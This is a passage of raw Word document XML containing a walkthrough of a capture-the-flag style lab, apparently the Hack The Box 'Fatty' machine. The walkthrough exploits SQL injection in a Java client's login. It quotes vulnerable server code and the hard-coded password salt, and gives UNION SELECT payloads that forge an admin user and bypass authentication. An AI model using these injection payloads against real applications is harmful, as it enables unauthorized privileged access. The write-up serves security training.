    <w:p w14:paraId="1100E7F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digest = MessageDigest.getInstance("SHA-256");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD02C12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 catch (NoSuchAlgorithmException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37AEF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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640207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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A037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byte[] hash = digest.digest(hashString.getBytes(StandardCharsets.UTF_8));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3D9B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this.password = DatatypeConverter.printHexBinary(hash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553905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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D4BA5D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username is accepted without modification, but the password is changed to the format below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE3F13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2CC6AC1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sha256(username+password+"clarabibimakeseverythingsecure")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC41C28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also notice that the username isn't sanitized and is directly used in the SQL query, making it vulnerable to SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7920C4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43EAF12B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rs = stmt.executeQuery("SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2732E307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checkLogin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 in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htb/fatty/server/database/FattyDbSession.class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writes the SQL exception to a log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C464D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3161F21B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1591D27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this.logger.logError("[-] Failure with SQL query: ==&gt; SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "' &lt;==");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645201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 xml:space="preserve">      this.logger.logError("[-] Exception was: '" + e.getMessage() + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBDC0D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1765E18D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Login into the application using the username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qtc'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validate the SQL injection vulnerability reveals a syntax error. To see the error, we need to edit the code in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fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java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as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A9765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71DEC7D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ClientGuiTest.this.currentFolder = "../logs";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6891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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6BB9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response = ClientGuiTest.this.invoker.showFiles("../logs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB716BF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Listing the content of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error-log.txt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file reveals the following message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F09280" w14:textId="3B04030E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2CE5F048" wp14:editId="11065553">
            <wp:extent cx="5731510" cy="1337945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2073495217" name="Picture 3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r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0EBE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confirms that the username field is vulnerable to SQL Injection. However, login attempts using payloads such as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' or '1'='1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in both fields fail. Assuming that the username in the login form is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' or '1'='1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, the server will process the username as below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F6B7C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sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B536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SELECT id,username,email,password,role FROM users WHERE username='' or '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC8592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above query succeeds and returns the first record in the database. The server then creates a new user object with the obtained results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCE703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2837480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6BD37B5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(rs.next()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F1B3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int id = rs.getInt("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49349ED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String username = rs.getString("username");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE9A5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String email = rs.getString("email");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533B53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String password = rs.getString("password");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC3FB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String role = rs.getString("role");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4876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    newUser = new User(id, username, password, email, Role.getRoleByName(role), false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B37F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4E0DAA88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It then compares the newly created user password with the user-supplied password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D541405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1D91043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5F5CA540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if (newUser.getPassword().equalsIgnoreCase(user.getPassword()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C633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return newUser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6FC17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throw new LoginException("Wrong Password!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1C04C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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226ADF7B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then, the following value is produced by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newUser.getPassword()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function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C2A2D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62BAFEE6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sha256("qtc"+"clarabibi"+"clarabibimakeseverythingsecure") = 5a67ea356b858a2318017f948ba505fd867ae151d6623ec32be86e9c688bf046</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD1B5D1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user-supplied password hash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user.getPassword()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calculated as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38DADC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1230EBC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sha256("' or '1'='1" + "' or '1'='1" + "clarabibimakeseverythingsecure") = cc421e01342afabdd4857e7a1db61d43010951c7d5269e075a029f5d192ee1c8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D24AE5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Although the hash sent to the server by the client doesn't match the one in the database, and the password comparison fails, the SQL injection is still possible using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UNION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queries. Let's consider the following example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13901AF8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sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A67659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MariaDB [userdb]&gt; select * from users where username='john';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB17FB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337C6C5D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| username | password    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755F51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47A7596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| john     | password123 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CADA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393F1AEA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It is possible to create fake entries using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SELECT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operator. Let's input an invalid username to create a new user entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F859DA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sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BC7A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MariaDB [userdb]&gt; select * from users where username='test' union select 'admin', 'welcome123';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21481CA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667F0BBA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| username | password    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1C41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7FFCD1A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| admin    | welcome123  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103634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+----------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03BD5C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Similarly, the injection in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username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field can be leveraged to create a fake user entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8438DB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1785F98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test' UNION SELECT 1,'invaliduser','invalid@a.b','invalidpass','admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1C2CD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This way, the password, and the assigned role can be controlled. The following snippet of code sends the plaintext password entered in the form. Let's modify the code in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htb/fatty/shared/resources/User.java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to submit the password as it is from the client application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695AEC64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java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602BA1D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User(int uid, String username, String password, String email, Role role) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC1245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this.uid = uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8582C8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this.username = username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF728D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this.password = password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5C4FF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this.email = email;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C35A3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this.role = role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15686891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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618036D3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public void setPassword(String password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC426AE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  this.password = password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C9584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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0942F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We can now rebuild the JAR file and attempt to log in using the payload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abc' UNION SELECT 1,'abc','a@b.com','abc','admin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username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field and the random text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abc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in the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password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field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1C7DD" w14:textId="1D6D828F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0C3FB9EC" wp14:editId="70919E29">
            <wp:extent cx="5731510" cy="2448560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="685941885" name="Picture 2" descr="by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ypa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1546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The server will eventually process the following query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755C371" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE73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Code: sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037BBE9" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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select id,username,email,password,role from users where username='abc' UNION SELECT 1,'abc','a@b.com','abc','admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5530CF22" w14:textId="77777777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first select query fails, while the second returns valid user results with the role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admin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and the password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abc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The password sent to the server is also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abc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, which results in a successful password comparison, and the application allows us to log in as the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE73D7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admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE73D7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4C871DFF" w14:textId="3EE9D289" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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FE73D7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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CC5C51" wp14:editId="7A30D860">
            <wp:extent cx="5731510" cy="781685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="527701554" name="Picture 1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mi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B6C3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2803"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7398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72A37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69D6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479565">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="54757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59"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00731559"/>
    <w:rsid w:val="00FE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6D62A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D7B4C853-B990-4555-BDF7-E7CF8AA3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7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D7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73D7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customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FE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73D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowdot">
    <w:name w:val="window_dot"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE73D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE73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D7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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE73D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE73D7"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE73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3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java-decompiler.github.io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2851</Words>
  <Characters>16256</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>135</Lines>
  <Paragraphs>38</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2023-07-12T13:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-12T13:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>